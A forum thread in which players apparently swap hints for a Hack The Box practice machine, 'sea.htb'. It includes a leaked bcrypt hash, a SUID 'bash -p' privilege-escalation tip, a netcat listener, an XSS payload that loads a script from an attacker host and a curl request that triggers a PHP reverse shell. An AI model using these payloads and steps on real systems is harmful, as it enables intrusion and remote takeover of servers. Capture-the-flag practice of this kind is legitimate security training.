Posts: 148
Threads: 2
Joined: Oct 2023
Aug 10, 2024, 10:23 PM
(This post was last modified: Aug 10, 2024, 10:23 PM by peRd1.)
(Aug 10, 2024, 10:21 PM)ametah Wrote: i got shell but permission denied to read user.txt at /home/amay/user.txt
I see password $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q but don't know what to do with it. Your shell is www-data, you aren't amay yet. Find its credentials. Plaintext. Go go. Search. (also you can find in this thread).
(Aug 10, 2024, 10:22 PM)osamy7593 Wrote: lol only me after foothold did /usr/bin/bash -p and got root lol Because people chmod u+x the /bin/bahs in public instances and leave boxes like that
Posts: 26
Threads: 2
Joined: Jul 2024
(Aug 10, 2024, 10:21 PM)ametah Wrote: i got shell but permission denied to read user.txt at /home/amay/user.txt
I see password $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q but don't know what to do with it.
reformat the hash to match bcrypt
Posts: 4
Threads: 0
Joined: Aug 2024
It is showing send the below link to admin, from where
Posts: 33
Threads: 0
Joined: Aug 2024
people also complete the services of the dirty door
Posts: 14
Threads: 0
Joined: Jul 2024
If you have no idea how to reformat it just ask Chatgpt.
Posts: 30
Threads: 3
Joined: Aug 2023
Aug 10, 2024, 10:39 PM
(This post was last modified: Aug 10, 2024, 10:40 PM by DeDeLaPouille.)
I'm stuck in the os injection for root, any hint plz ?
Posts: 4
Threads: 0
Joined: Aug 2024
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where some one help me
Posts: 14
Threads: 0
Joined: Jul 2024
Aug 10, 2024, 10:45 PM
(This post was last modified: Aug 10, 2024, 10:46 PM by OffensiveBias.)
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote: (Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where some one help me
python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx
It willl then tell you
nc -lvp xxxx
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="
send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'
Posts: 1
Threads: 0
Joined: Aug 2024
hello can anyone tell me how did you ger the reverse shell
Posts: 28
Threads: 0
Joined: Aug 2024
Interesting daily cron:
lrwxrwxrwx 1 root root 37 Jul 29 22:16 google-chrome -> /opt/google/chrome/cron/google-chrome
|